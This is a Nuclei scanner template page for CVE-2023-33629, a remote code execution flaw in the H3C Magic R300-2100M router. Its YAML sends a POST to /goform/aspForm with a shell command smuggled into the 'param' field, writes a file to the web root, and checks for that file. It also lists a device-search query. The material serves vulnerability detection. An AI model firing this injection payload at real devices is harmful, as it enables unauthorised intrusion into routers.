Skip to content
Nuclei Templates

H3C Magic R300-2100M - Remote Code Execution

ID: CVE-2023-33629

Severity: high

Author: DhiyaneshDK

Tags: cve2023,cve,router,rce,h3c

Description

Section titled “Description”

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.

YAML Source

Section titled “YAML Source”
id: CVE-2023-33629


info:
  name: H3C Magic R300-2100M - Remote Code Execution
  author: DhiyaneshDK
  severity: high
  description: |
    H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33629
    - https://hackmd.io/@0dayResearch/r1UjggZfh
    - https://hackmd.io/%400dayResearch/r1UjggZfh
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-33629
    cwe-id: CWE-787
    epss-score: 0.01254
    epss-percentile: 0.85534
    cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: h3c
    product: magic_r300-2100m_firmware
    fofa-query:
      - app="H3C-Ent-Router"
      - app="h3c-ent-router"
  tags: cve2023,cve,router,rce,h3c
variables:
  filename: "{{to_lower(rand_text_alpha(7))}}"


http:
  - raw:
      - |
        POST /goform/aspForm HTTP/1.1
        Host: {{Hostname}}


        CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{filename}});
      - |
        GET /{{filename}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 302
          - contains(body_1, 'do_cmd.asp')
          - status_code_2 == 200
          - contains_all(body_2, 'www', 'www_multi')
        condition: and
# digest: 4b0a00483046022100d53f33de0f277628d885c3f230eda4927be47a2cfb8a5acc60a3af5f55e22f7802210089d1e6435a129e514a2d3b2f1db7dedeb6e256b43126e74b693497046ef8995f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-33629.yaml"

View on Github